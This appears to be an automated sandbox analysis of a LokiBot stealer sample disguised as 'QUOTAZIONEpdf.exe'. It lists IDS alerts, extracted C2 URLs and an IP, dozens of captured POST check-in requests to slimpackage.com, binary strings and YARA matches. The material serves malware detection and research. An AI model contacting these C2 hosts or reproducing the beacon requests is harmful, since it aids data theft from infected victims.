          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49865 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49865 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49865 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49866 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49866 -> 104.223.93.105:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49866 -> 104.223.93.105:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
          Source: Malware configuration extractorURLs: http://slimpackage.com/slimmain/five/fre.php
          Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
          Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
          Source: Joe Sandbox ViewIP Address: 104.223.93.105 104.223.93.105
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 08:52:37 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Jan 2022 08:52:39 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: QUOTAZIONEpdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: QUOTAZIONEpdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: QUOTAZIONEpdf.exe, 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmpString found in binary or memory: http://slimpackage.com/slimmain/five/fre.php
          Source: QUOTAZIONEpdf.exe, QUOTAZIONEpdf.exe, 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, QUOTAZIONEpdf.exe, 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
          Source: unknownHTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 190Connection: close
          Source: unknownDNS traffic detected: queries for: slimpackage.com
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 2_2_00404ED4 recv,2_2_00404ED4
          Source: C:\Users\user\Desktop\QUOTAZIONEpdf.exeCode function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00404F61

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.2.QUOTAZIONEpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000002.300893837.0000000003040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000001.300351169.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000000.297157069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000000.296240818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000000.299679692.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000002.00000000.295438883.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: QUOTAZIONEpdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.QUOTAZIONEpdf.exe.3040000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.1.QUOTAZIONEpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 2.0.QUOTAZIONEpdf.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
